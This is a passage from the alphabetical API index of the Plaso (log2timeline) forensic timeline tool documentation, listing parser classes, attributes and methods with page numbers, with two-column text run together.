(plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineUserEngagedEventDataREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin attribute), 314 attribute), 268 request_headers (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin attribute), 222 attribute), 271 request_method (plaso.parsers.firefox_cache.FirefoxCacheEventDataREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.imessage.IMessagePlugin attribute), 374 attribute), 274 request_size (plaso.parsers.firefox_cache.FirefoxCacheEventDataREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.interface.SQLitePlugin attribute), 374 attribute), 276 requested_uri_stem (plaso.parsers.iis.IISEventData REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin attribute), 379 attribute), 277 requester (plaso.parsers.apt_history.APTHistoryLogEventDataREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin attribute), 355 attribute), 279 REQUIRED_ITEMS (plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPluginREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin attribute), 229 attribute), 282 REQUIRED_ITEMS (plaso.parsers.olecf_plugins.interface.OLECFPluginREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin attribute), 230 attribute), 283 REQUIRED_ITEMS (plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPluginREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin attribute), 231 attribute), 284 REQUIRED_ITEMS (plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPluginREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin attribute), 232 attribute), 287 REQUIRED_KEYS (plaso.parsers.chrome_preferences.ChromePreferencesParserREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin attribute), 365 attribute), 289 REQUIRED_PATHS (plaso.parsers.czip_plugins.interface.CompoundZIPPluginREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin attribute), 217 attribute), 290 REQUIRED_PATHS (plaso.parsers.czip_plugins.oxml.OpenXMLPluginREQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin

596 Index Plaso (log2timeline), Release 20210606

attribute), 291 tribute), 360 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqliteretweet_count (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSStatusEventData attribute), 293 attribute), 311 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.skype.SkypePluginretweeted (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData attribute), 297 attribute), 307 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePluginrevision (plaso.parsers.winreg_plugins.usbstor.USBStorEventData attribute), 301 attribute), 347 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPluginrevision_number (plaso.parsers.czip_plugins.oxml.OpenXMLEventData attribute), 303 attribute), 218 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPluginright_operand (plaso.filters.filters.BinaryOperator at- attribute), 305 tribute), 160 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPluginroom (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventData attribute), 309 attribute), 289 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePluginroot (plaso.containers.plist_event.PlistTimeEventData attribute), 312 attribute), 110 REQUIRED_STRUCTURE (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePluginroot_key (plaso.lib.plist.PlistFile attribute), 184 attribute), 314 ROOT_VERSION_PATH (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin REQUIRED_TABLES (plaso.parsers.esedb_plugins.file_history.FileHistoryESEDBPluginattribute), 283 attribute), 219 row_identifier (plaso.storage.identifiers.SQLTableIdentifier REQUIRED_TABLES (plaso.parsers.esedb_plugins.interface.ESEDBPluginproperty), 495 attribute), 221 rpc_port (plaso.multi_process.base_process.MultiProcessBaseProcess REQUIRED_TABLES (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPluginattribute), 187 attribute), 223 RPCClient (class in plaso.multi_process.rpc), 191 REQUIRED_TABLES (plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPluginRPCServer (class in plaso.multi_process.rpc), 191 attribute), 228 rule (plaso.parsers.mcafeeav.McafeeAVEventData at- REQUIRES_SCHEMA_MATCH tribute), 396 (plaso.parsers.sqlite_plugins.interface.SQLitePluginrun() (plaso.analysis.hash_tagging.HashAnalyzer attribute), 276 method), 42 Reset() (plaso.analyzers.hashing_analyzer.HashingAnalyzerrun() (plaso.multi_process.base_process.MultiProcessBaseProcess method), 59 method), 187 Reset() (plaso.analyzers.interface.BaseAnalyzer run_count (plaso.parsers.winprefetch.WinPrefetchExecutionEventData method), 60 attribute), 463 Reset() (plaso.analyzers.yara_analyzer.YaraAnalyzer RunKeyEventData (class in method), 61 plaso.parsers.winreg_plugins.run), 339 Reset() (plaso.parsers.text_parser.EncodedTextReader RunPlugins() (plaso.preprocessors.manager.PreprocessPluginsManager method), 445 class method), 474 ResetFileEntry() (plaso.parsers.mediator.ParserMediator method), 399 S resolver_context (plaso.parsers.mediator.ParserMediators_computername (plaso.parsers.iis.IISEventData property), 400 attribute), 379 response_code (plaso.parsers.firefox_cache.FirefoxCacheEventDatas_sitename (plaso.parsers.iis.IISEventData attribute), attribute), 374 380 response_headers (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainerEventDataSafariBinaryCookieEventData (class in attribute), 222 plaso.parsers.safari_cookies), 418 restore_point_event_type SafariHistoryEventData (class in (plaso.parsers.winrestore.RestorePointEventData plaso.parsers.plist_plugins.safari), 236 attribute), 464 SafariHistoryPageVisitedEventData (class in restore_point_type (plaso.parsers.winrestore.RestorePointEventDataplaso.parsers.sqlite_plugins.safari), 292 attribute), 464 SafariHistoryPlugin (class in RestorePointEventData (class in plaso.parsers.plist_plugins.safari), 237 plaso.parsers.winrestore), 464 SafariHistoryPluginSqlite (class in RestorePointLogParser (class in plaso.parsers.sqlite_plugins.safari), 293 plaso.parsers.winrestore), 465 Sample() (plaso.engine.profilers.MemoryProfiler return_value (plaso.parsers.bsm.BSMEventData at- method), 146

Index 597 Plaso (log2timeline), Release 20210606

Sample() (plaso.engine.profilers.StorageProfiler SCCMParser (class in plaso.parsers.sccm), 424 method), 146 schema (plaso.containers.artifacts.HostnameArtifact at- Sample() (plaso.engine.profilers.TaskQueueProfiler tribute), 98 method), 147 schema (plaso.parsers.sqlite.SQLiteDatabase attribute), Sample() (plaso.engine.profilers.TasksProfiler method), 435 147 SCHEMA_QUERY (plaso.parsers.sqlite.SQLiteDatabase at- sample_rate (plaso.engine.configurations.ProfilingConfiguration tribute), 435 attribute), 126 SCHEMAS (plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin SampleFileProfiler (class in plaso.engine.profilers), attribute), 241 146 SCHEMAS (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin SampleMemoryUsage() attribute), 244 (plaso.parsers.mediator.ParserMediator SCHEMAS (plaso.parsers.sqlite_plugins.android_webview.WebViewPlugin method), 399 attribute), 246 SampleStart() (plaso.engine.profilers.CPUTimeMeasurementSCHEMAS (plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin method), 145 attribute), 247 SampleStartTiming() SCHEMAS (plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePlugin (plaso.parsers.mediator.ParserMediator attribute), 247 method), 399 SCHEMAS (plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPlugin SampleStop() (plaso.engine.profilers.CPUTimeMeasurement attribute), 249 method), 145 SCHEMAS (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePlugin SampleStopTiming() (plaso.parsers.mediator.ParserMediator attribute), 250 method), 399 SCHEMAS (plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePlugin SampleTaskStatus() (plaso.multi_process.task_manager.TaskManagerattribute), 250 method), 194 SCHEMAS (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPlugin SAMUsersWindowsRegistryEventData (class in attribute), 252 plaso.parsers.winreg_plugins.sam_users), 339 SCHEMAS (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPlugin SAMUsersWindowsRegistryPlugin (class in attribute), 255 plaso.parsers.winreg_plugins.sam_users), SCHEMAS (plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPlugin 340 attribute), 257 SantaExecutionEventData (class in SCHEMAS (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin plaso.parsers.santa), 419 attribute), 260 SantaFileSystemEventData (class in SCHEMAS (plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin plaso.parsers.santa), 420 attribute), 261 SantaMountEventData (class in plaso.parsers.santa), SCHEMAS (plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin 421 attribute), 263 SantaParser (class in plaso.parsers.santa), 422 SCHEMAS (plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin sc_substatus (plaso.parsers.iis.IISEventData at- attribute), 268 tribute), 379 SCHEMAS (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin sc_win32_status (plaso.parsers.iis.IISEventData at- attribute), 271 tribute), 379 SCHEMAS (plaso.parsers.sqlite_plugins.imessage.IMessagePlugin scale_crop (plaso.parsers.czip_plugins.oxml.OpenXMLEventData attribute), 274 attribute), 218 SCHEMAS (plaso.parsers.sqlite_plugins.interface.SQLitePlugin scan_type (plaso.parsers.trendmicroav.TrendMicroAVEventData attribute), 276 attribute), 450 SCHEMAS (plaso.parsers.sqlite_plugins.kik_ios.KikIOSPlugin ScanForProcessedTasks() attribute), 277 (plaso.storage.redis.redis_store.RedisStore SCHEMAS (plaso.parsers.sqlite_plugins.kodi.KodiMyVideosPlugin class method), 486 attribute), 279 scanid (plaso.parsers.symantec.SymantecEventData at- SCHEMAS (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantinePlugin tribute), 440 attribute), 282 ScanSource() (plaso.cli.storage_media_tool.StorageMediaToolSCHEMAS (plaso.parsers.sqlite_plugins.mac_document_versions.MacDocumentVersionsPlugin method), 90 attribute), 283 ScanSource() (plaso.cli.storage_media_tool.StorageMediaToolVolumeScannerSCHEMAS (plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCPlugin method), 91 attribute), 284 SCCMLogEventData (class in plaso.parsers.sccm), 424 SCHEMAS (plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin

598 Index Plaso (log2timeline), Release 20210606

attribute), 287 SELinuxLogEventData (class in plaso.parsers.selinux), SCHEMAS (plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin426 attribute), 289 SELinuxParser (class in plaso.parsers.selinux), 426 SCHEMAS (plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePluginsender (plaso.parsers.asl.ASLEventData attribute), 357 attribute), 290 sender (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData SCHEMAS (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin attribute), 389 attribute), 292 sender (plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData SCHEMAS (plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqliteattribute), 270 attribute), 293 sender_pid (plaso.parsers.mac_securityd.MacOSSecuritydLogEventData SCHEMAS (plaso.parsers.sqlite_plugins.skype.SkypePlugin attribute), 389 attribute), 297 sent_bytes (plaso.parsers.iis.IISEventData attribute), SCHEMAS (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin379 attribute), 301 sequence_number (plaso.parsers.pls_recall.PlsRecallEventData SCHEMAS (plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPluginattribute), 410 attribute), 303 sequence_number (plaso.parsers.winrestore.RestorePointEventData SCHEMAS (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPluginattribute), 465 attribute), 305 sequence_number (plaso.storage.identifiers.FakeIdentifier SCHEMAS (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSPlugin attribute), 494 attribute), 309 sequence_number (plaso.storage.identifiers.RedisKeyIdentifier SCHEMAS (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelinePluginattribute), 494 attribute), 312 sequence_number (plaso.storage.identifiers.SQLTableIdentifier SCHEMAS (plaso.parsers.sqlite_plugins.zeitgeist.ZeitgeistActivityDatabasePluginattribute), 495 attribute), 314 serial (plaso.parsers.santa.SantaMountEventData at- screen_name (plaso.parsers.sqlite_plugins.twitter_ios.TwitterIOSContactEventDatatribute), 421 attribute), 308 serial (plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventData search_query (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidSearchEventDataattribute), 346 attribute), 307 serial (plaso.parsers.winreg_plugins.usbstor.USBStorEventData secondary_url (plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventDataattribute), 347 attribute), 363 serial_number (plaso.containers.windows_events.WindowsVolumeEventData SECONDS_BETWEEN_STATUS_LOG_MESSAGES attribute), 122 (plaso.analysis.hash_tagging.HashTaggingAnalysisPluginserialization_format attribute), 43 (plaso.storage.interface.BaseStore attribute), seconds_spent_analyzing 495 (plaso.analysis.hash_tagging.HashAnalyzer serialization_format attribute), 41 (plaso.storage.sqlite.sqlite_file.SQLiteStorageFile seconds_spent_analyzing attribute), 489 (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer at- SerializationError, 181 tribute), 47 SerializersProfiler (class in plaso.engine.profilers), section_names (plaso.parsers.pe.PEEventData at- 146 tribute), 409 server_name (plaso.parsers.apache_access.ApacheAccessEventData secure (plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventDataattribute), 353 attribute), 245 server_name (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventData secure (plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventDataattribute), 329 attribute), 251 server_name (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData secure (plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventDataattribute), 334 attribute), 259 service (plaso.parsers.sqlite_plugins.imessage.IMessageEventData security_api (plaso.parsers.mac_securityd.MacOSSecuritydLogEventDataattribute), 273 attribute), 389 service (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry SECURITYD_LINE (plaso.parsers.mac_securityd.MacOSSecuritydLogParserattribute), 291 attribute), 390 service_dll (plaso.analysis.windows_services.WindowsService seedtime (plaso.parsers.bencode_plugins.transmission.TransmissionEventDataattribute), 52 attribute), 212 service_dll (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData seedtime (plaso.parsers.bencode_plugins.utorrent.UTorrentEventDataattribute), 341 attribute), 213 service_pack (plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData

Index 599 Plaso (log2timeline), Release 20210606

attribute), 350 method), 133 service_type (plaso.analysis.windows_services.WindowsServiceSetEventDataIdentifier() attribute), 53 (plaso.containers.events.EventObject method), service_type (plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData106 attribute), 341 SetEventDataStreamIdentifier() services (plaso.analysis.windows_services.WindowsServiceCollection(plaso.containers.events.EventData method), property), 54 105 ServicesPlugin (class in SetEventIdentifier() plaso.parsers.winreg_plugins.services), 340 (plaso.containers.events.EventTag method), Session (class in plaso.containers.sessions), 111 107 session (plaso.parsers.popcontest.PopularityContestSessionEventDataSetEventTag() (plaso.storage.event_tag_index.EventTagIndex attribute), 415 method), 492 session_identifier (plaso.containers.tasks.Task at- SetExtractionConfiguration() tribute), 118 (plaso.engine.worker.EventExtractionWorker session_identifier (plaso.containers.tasks.TaskCompletion method), 148 attribute), 119 SetFieldDelimiter() session_identifier (plaso.containers.tasks.TaskStart (plaso.output.shared_dsv.DSVEventFormattingHelper attribute), 119 method), 207 SessionCompletion (class in SetFieldDelimiter() plaso.containers.sessions), 114 (plaso.output.shared_dsv.DSVOutputModule SessionConfiguration (class in method), 207 plaso.containers.sessions), 114 SetFields() (plaso.output.shared_dsv.DSVEventFormattingHelper SessionizeAnalysisArgumentsHelper (class in method), 207 plaso.cli.helpers.sessionize_analysis), 74 SetFields() (plaso.output.shared_dsv.DSVOutputModule SessionizeAnalysisPlugin (class in method), 207 plaso.analysis.sessionize), 48 SetFields() (plaso.output.shared_elastic.SharedElasticsearchOutputModule sessions (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventDatamethod), 208 attribute), 213 SetFields() (plaso.output.xlsx.XLSXOutputModule SessionStart (class in plaso.containers.sessions), 115 method), 210 set_identifier (plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheContainersEventDataSetFileEntry() (plaso.parsers.mediator.ParserMediator attribute), 222 method), 399 SetActiveSession() (plaso.engine.knowledge_base.KnowledgeBaseSetFileEntry() (plaso.preprocessors.mediator.PreprocessMediator method), 133 method), 475 SetAnalyzersProfiler() SetFlushInterval() (plaso.output.shared_elastic.SharedElasticsearchOutputModule (plaso.engine.worker.EventExtractionWorker method), 208 method), 148 SetHasherNames() (plaso.analyzers.hashing_analyzer.HashingAnalyzer SetAndLoadTagFile() method), 59 (plaso.analysis.tagging.TaggingAnalysisPlugin SetHost() (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin method), 48 method), 46 SetAPIKey() (plaso.analysis.virustotal.VirusTotalAnalysisPluginSetHost() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer method), 51 method), 47 SetAPIKey() (plaso.analysis.virustotal.VirusTotalAnalyzerSetHost() (plaso.analysis.viper.ViperAnalysisPlugin method), 52 method), 50 SetAttribute() (plaso.filters.expressions.Expression SetHost() (plaso.analysis.viper.ViperAnalyzer method), method), 157 51 SetCACertificatesPath() SetHostname() (plaso.engine.knowledge_base.KnowledgeBase (plaso.output.shared_elastic.SharedElasticsearchOutputModulemethod), 133 method), 208 SetIdentifier() (plaso.containers.interface.AttributeContainer SetCodepage() (plaso.engine.knowledge_base.KnowledgeBase method), 109 method), 133 SetIdentifier() (plaso.lib.specification.Signature SetDefaultValue() (plaso.filters.path_filter.PathFilterScanTreeNodemethod), 185 method), 166 SetIndexName() (plaso.output.shared_elastic.SharedElasticsearchOutputModule SetEnvironmentVariable() method), 208 (plaso.engine.knowledge_base.KnowledgeBase SetLabel() (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin

600 Index Plaso (log2timeline), Release 20210606

method), 46 SetSourceInformation() SetLookupHash() (plaso.analysis.hash_tagging.HashAnalyzer (plaso.cli.status_view.StatusView method), method), 42 89 SetLookupHash() (plaso.analysis.hash_tagging.HashTaggingAnalysisPluginSetStorageFileInformation() method), 43 (plaso.cli.status_view.StatusView method), SetMappings() (plaso.output.shared_elastic.SharedElasticsearchOutputModule90 method), 208 SetStorageProfiler() SetMaximumPause() (plaso.analysis.sessionize.SessionizeAnalysisPlugin(plaso.storage.interface.BaseStore method), method), 48 497 SetMode() (plaso.cli.status_view.StatusView method), SetStorageProfiler() 89 (plaso.storage.reader.StorageReader method), SetMountPath() (plaso.engine.knowledge_base.KnowledgeBase 500 method), 134 SetStorageProfiler() SetOperator() (plaso.filters.expressions.Expression (plaso.storage.writer.StorageWriter method), method), 157 503 SetOutputFormat() (plaso.analysis.windows_services.WindowsServicesAnalysisPluginSetStorageWriter() (plaso.parsers.mediator.ParserMediator method), 54 method), 400 SetPassword() (plaso.output.shared_elastic.SharedElasticsearchOutputModuleSetTextPrepend() (plaso.engine.knowledge_base.KnowledgeBase method), 208 method), 134 SetPort() (plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin SetTimelineIdentifier() method), 47 (plaso.output.elastic_ts.ElasticTimesketchOutputModule SetPort() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer method), 196 method), 47 SetTimestampFormat() SetPort() (plaso.analysis.viper.ViperAnalysisPlugin (plaso.output.xlsx.XLSXOutputModule method), 50 method), 210 SetPort() (plaso.analysis.viper.ViperAnalyzer method), SetTimeZone() (plaso.engine.knowledge_base.KnowledgeBase 51 method), 134 SetPreferredLanguageIdentifier() SetTimezone() (plaso.output.mediator.OutputMediator (plaso.output.mediator.OutputMediator method), 205 method), 205 settings (plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventData SetProcessingProfiler() attribute), 333 (plaso.engine.worker.EventExtractionWorker SetupapiLogEventData (class in method), 148 plaso.parsers.setupapi), 427 SetProtocol() (plaso.analysis.viper.ViperAnalysisPlugin SetupapiLogParser (class in plaso.parsers.setupapi), method), 50 427 SetProtocol() (plaso.analysis.viper.ViperAnalyzer SetURLPrefix() (plaso.output.shared_elastic.SharedElasticsearchOutputModule method), 51 method), 208 SetRules() (plaso.analyzers.yara_analyzer.YaraAnalyzer SetUsername() (plaso.output.shared_elastic.SharedElasticsearchOutputModule method), 61 method), 208 SetSerializersProfiler() SetUseSSL() (plaso.output.shared_elastic.SharedElasticsearchOutputModule (plaso.storage.interface.BaseStore method), method), 208 497 SetValue() (plaso.engine.knowledge_base.KnowledgeBase SetSerializersProfiler() method), 134 (plaso.storage.reader.StorageReader method), severity (plaso.parsers.syslog.SyslogLineEventData at- 500 tribute), 442 SetSerializersProfiler() severity (plaso.parsers.winevt.WinEvtRecordEventData (plaso.storage.writer.StorageWriter method), attribute), 456 502 sha1 (plaso.parsers.winreg_plugins.amcache.AMCacheFileEventData SetServerInformation() attribute), 319 (plaso.output.shared_elastic.SharedElasticsearchOutputModulesha1_hash (plaso.containers.events.EventDataStream method), 208 attribute), 105 SetSessionIdentifier() SHA1Hasher (class in plaso.analyzers.hashers.sha1), 58 (plaso.containers.interface.AttributeContainer sha256_hash (plaso.containers.events.EventDataStream method), 109 attribute), 105

Index 601 Plaso (log2timeline), Release 20210606

SHA256Hasher (class in 479 plaso.analyzers.hashers.sha256), 58 size (plaso.lib.bufferlib.CircularBuffer property), 178 share_name (plaso.parsers.winreg_plugins.mountpoints.MountPoints2EventDatasize (plaso.lib.dtfabric_helper.DtFabricHelper at- attribute), 329 tribute), 179 share_name (plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventDatasize (plaso.parsers.mactime.MactimeEventData at- attribute), 334 tribute), 392 shared (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventDatasize (plaso.parsers.olecf_plugins.default.OLECFItemEventData attribute), 269 attribute), 230 shared_doc (plaso.parsers.czip_plugins.oxml.OpenXMLEventDatasize (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData attribute), 218 attribute), 269 SharedElasticsearchFieldFormattingHelper size (plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventData (class in plaso.output.shared_elastic), 207 attribute), 270 SharedElasticsearchOutputModule (class in size (plaso.parsers.winfirewall.WinFirewallEventData plaso.output.shared_elastic), 207 attribute), 458 shell_item_path (plaso.containers.shell_item_events.ShellItemFileEntryEventDataSIZE_LIMIT (plaso.analyzers.interface.BaseAnalyzer at- attribute), 116 tribute), 60 ShellItemFileEntryEventData (class in SkipAhead() (plaso.parsers.text_parser.EncodedTextReader plaso.containers.shell_item_events), 116 method), 445 ShellItemFileEntryNameFormatterHelper (class in SkyDriveLogEventData (class in plaso.formatters.shell_items), 174 plaso.parsers.skydrivelog), 428 ShellItemsParser (class in SkyDriveLogParser (class in plaso.parsers.shared.shell_items), 239 plaso.parsers.skydrivelog), 429 short_filename (plaso.parsers.recycler.WinRecycleBinEventDataSkyDriveOldLogEventData (class in attribute), 417 plaso.parsers.skydrivelog), 430 show_info (plaso.cli.log2timeline_tool.Log2TimelineTool SkyDriveOldLogParser (class in attribute), 84 plaso.parsers.skydrivelog), 430 show_troubleshooting (plaso.cli.tools.CLITool SkypeAccountEventData (class in attribute), 93 plaso.parsers.sqlite_plugins.skype), 294 ShowInfo() (plaso.cli.log2timeline_tool.Log2TimelineToolSkypeCallEventData (class in method), 85 plaso.parsers.sqlite_plugins.skype), 295 ShutdownWindowsRegistryEventData (class in SkypeChatEventData (class in plaso.parsers.winreg_plugins.shutdown), 341 plaso.parsers.sqlite_plugins.skype), 295 ShutdownWindowsRegistryPlugin (class in SkypePlugin (class in plaso.parsers.winreg_plugins.shutdown), plaso.parsers.sqlite_plugins.skype), 296 342 SkypeSMSEventData (class in SignalAbort() (plaso.analysis.hash_tagging.HashAnalyzer plaso.parsers.sqlite_plugins.skype), 299 method), 42 SkypeTransferFileEventData (class in SignalAbort() (plaso.analysis.mediator.AnalysisMediator plaso.parsers.sqlite_plugins.skype), 299 method), 46 sms_read (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData SignalAbort() (plaso.engine.worker.EventExtractionWorker attribute), 243 method), 148 SMS_READ (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin SignalAbort() (plaso.multi_process.analysis_process.AnalysisProcessattribute), 244 method), 187 sms_type (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData SignalAbort() (plaso.multi_process.base_process.MultiProcessBaseProcessattribute), 243 method), 187 SMS_TYPE (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin SignalAbort() (plaso.multi_process.extraction_process.ExtractionWorkerProcessattribute), 244 method), 188 snapshots_only (plaso.cli.storage_media_tool.StorageMediaToolVolumeScannerOptions SignalAbort() (plaso.parsers.mediator.ParserMediator attribute), 91 method), 400 snd_status (plaso.parsers.symantec.SymantecEventData Signature (class in plaso.lib.specification), 185 attribute), 440 SignaturesFileEntryFilter (class in SOCKET_CONNECTION_BIND plaso.filters.file_entry), 159 (plaso.engine.zeromq_queue.ZeroMQQueue SingleProcessEngine (class in attribute), 153 plaso.single_process.extraction_engine), SOCKET_CONNECTION_CONNECT

602 Index Plaso (log2timeline), Release 20210606

(plaso.engine.zeromq_queue.ZeroMQQueue source_type (plaso.cli.storage_media_tool.StorageMediaToolVolumeScanner attribute), 153 property), 91 SOCKET_CONNECTION_TYPE SourceConfigurationArtifact (class in (plaso.engine.zeromq_queue.ZeroMQBufferedReplyBindQueueplaso.containers.artifacts), 100 attribute), 149 sources (plaso.parsers.cookie_plugins.ganalytics.GoogleAnalyticsEventData SOCKET_CONNECTION_TYPE attribute), 214 (plaso.engine.zeromq_queue.ZeroMQPullConnectQueueSourceScannerError, 181 attribute), 150 specifications (plaso.lib.specification.FormatSpecificationStore SOCKET_CONNECTION_TYPE property), 185 (plaso.engine.zeromq_queue.ZeroMQPushBindQueueSplitExpression() (plaso.filters.parser_filter.ParserFilterExpressionHelper attribute), 151 method), 164 SOCKET_CONNECTION_TYPE SpotlightPlugin (class in (plaso.engine.zeromq_queue.ZeroMQQueue plaso.parsers.plist_plugins.spotlight), 238 attribute), 153 SpotlightStoreDatabaseParser (class in SOCKET_CONNECTION_TYPE plaso.parsers.spotlight_storedb), 432 (plaso.engine.zeromq_queue.ZeroMQRequestConnectQueueSpotlightStoreMetadataAttribute (class in attribute), 153 plaso.parsers.spotlight_storedb), 432 SoftwareUpdatePlugin (class in SpotlightStoreMetadataItem (class in plaso.parsers.plist_plugins.softwareupdate), plaso.parsers.spotlight_storedb), 432 237 SpotlightStoreMetadataItemEventData (class in SophosAVLogEventData (class in plaso.parsers.spotlight_storedb), 433 plaso.parsers.sophos_av), 431 SpotlightVolumePlugin (class in SophosAVLogParser (class in plaso.parsers.plist_plugins.spotlight_volume), plaso.parsers.sophos_av), 431 238 source (plaso.analysis.windows_services.WindowsService Sqlite3DatabaseFile (class in attribute), 53 plaso.formatters.winevt_rc), 175 source (plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventDataSqlite3DatabaseReader (class in attribute), 299 plaso.formatters.winevt_rc), 175 source_code (plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventDataSQLiteCache (class in plaso.parsers.sqlite), 434 attribute), 376 SQLiteDatabase (class in plaso.parsers.sqlite), 435 source_code (plaso.parsers.skydrivelog.SkyDriveLogEventDataSQLiteParser (class in plaso.parsers.sqlite), 435 attribute), 429 SQLitePlugin (class in source_code (plaso.parsers.skydrivelog.SkyDriveOldLogEventData plaso.parsers.sqlite_plugins.interface), 275 attribute), 430 SQLiteStorageFile (class in source_configurations plaso.storage.sqlite.sqlite_file), 489 (plaso.containers.sessions.Session attribute), SQLiteStorageFileReader (class in 113 plaso.storage.sqlite.reader), 488 source_configurations SQLiteStorageFileWriter (class in (plaso.containers.sessions.SessionConfiguration plaso.storage.sqlite.writer), 491 attribute), 115 SQLTableIdentifier (class in source_ip (plaso.parsers.iis.IISEventData attribute), plaso.storage.identifiers), 495 379 src_call (plaso.parsers.sqlite_plugins.skype.SkypeCallEventData source_ip (plaso.parsers.networkminer.NetworkMinerEventData attribute), 295 attribute), 403 SRUMApplicationResourceUsageEventData (class in source_ip (plaso.parsers.winfirewall.WinFirewallEventData plaso.parsers.esedb_plugins.srum), 224 attribute), 458 SRUMNetworkConnectivityUsageEventData (class in source_name 